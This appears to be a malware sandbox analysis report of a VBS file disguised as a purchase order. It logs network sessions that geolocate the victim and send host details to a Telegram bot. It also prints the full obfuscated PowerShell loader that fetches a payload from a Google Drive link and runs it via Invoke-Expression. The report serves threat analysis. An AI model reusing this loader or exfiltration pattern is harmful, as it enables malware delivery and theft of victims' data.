                                                                            2024-10-23 15:23:56 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                            Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:23:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.1049987188.114.96.34434104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-23 15:23:57 UTC63OUTGET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-10-23 15:23:57 UTC896INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:57 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32973
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2Fs9VD9IFIykVjii6EazaB2Tul79bobDDtsEiSV3%2BZpTjiNhn74QBxJ31%2FpF4ldsyOME1qy0PQJdRZ6ojGkHQmOU274zqdJGvd2QqLruPo3Cv1mYn9t%2FwPghqspPqStQE6udvvrR"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb35d88946e9-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1119&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2473099&cwnd=248&unsent_bytes=0&cid=a81c7bc7b9369516&ts=158&x=0"
                                                                            2024-10-23 15:23:57 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                            Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:23:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.1049989188.114.96.34434104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-23 15:23:59 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:23:59 UTC904INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:59 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32975
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iaiUBbXExcD%2FBeyB4rh%2Fq6%2BEvAtWY82z3UMraWGk%2BH2z%2FBrhx2Y68B6lLGTpkBpEQQCWKMGkebcZJ4l%2FkvGPK4425GLFsDo05jqRAKoYQRilH2QCqMFnVhAAc8bOM%2F%2FKwnqM3uT3"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb3fdfc5e997-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1305&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2116959&cwnd=250&unsent_bytes=0&cid=af0bb251473bc508&ts=205&x=0"
                                                                            2024-10-23 15:23:59 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                            Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:23:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.1049991188.114.96.34434104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-23 15:24:00 UTC63OUTGET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-10-23 15:24:01 UTC904INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:24:01 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32977
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qKVAVeZzya%2FwdZLew97FfQ7EIYpCmB8%2FGEGBkjWqIRumqSjtXdoz6mR7p%2FcdYagAxA%2BXNG6YZIuW%2FbFwXn3ch%2B2eTE%2BSGkEEiTEIrGoXTTiha5AYHm2zpfr059%2BZLTfOBP7550UY"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb4a4ef86c57-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1144&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2222563&cwnd=251&unsent_bytes=0&cid=e8fa356c613eb154&ts=165&x=0"
                                                                            2024-10-23 15:24:01 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                            Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:24:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.1049993188.114.96.34434104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-23 15:24:02 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:24:02 UTC902INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:24:02 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32978
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7mpbHW8Or4R%2FRrQquOGduBcbSWNPQ8lQRU3TCCb%2BRjKVtlD4hlKv%2B5RGWPz6UALq4Ta4KF4ChtI%2Bj1we4FT6ivMoewlTw6Aqys%2FLjrDhkGnfI%2Bd7bJWWnWtdlO%2BT5btE3MMx1fDe"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb54a9bd6b4c-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1217&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2124724&cwnd=231&unsent_bytes=0&cid=d1bfcd6f30ee58dc&ts=175&x=0"
                                                                            2024-10-23 15:24:02 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                            Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:24:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.1049995188.114.96.34434104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-23 15:24:04 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:24:04 UTC888INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:24:04 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32980
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Meua0N3U54eISYA6qw02X2i0K5oE2QH9KrwEoroyncLAP7P2sIeGKFWAQwjtFQokVMS5tc4SQpCkfcX4r7TPa4Jmb2uC3nQHGlPqEngzHIhZHdAiGD41x6d66zEQUjdpTTIHRkV"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb5ef9f6a918-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1523&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1758348&cwnd=177&unsent_bytes=0&cid=3cdcea4f41d151ec&ts=157&x=0"
                                                                            2024-10-23 15:24:04 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                            Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:24:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.1049996149.154.167.2204434104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-23 15:24:05 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2024/10/2024%20/%2003:15:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                            Host: api.telegram.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:24:05 UTC344INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0
                                                                            Date: Wed, 23 Oct 2024 15:24:05 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 55
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                            2024-10-23 15:24:05 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:11:22:53
                                                                            Start date:23/10/2024
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs"
                                                                            Imagebase:0x7ff7e2c60000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:11:22:56
                                                                            Start date:23/10/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g 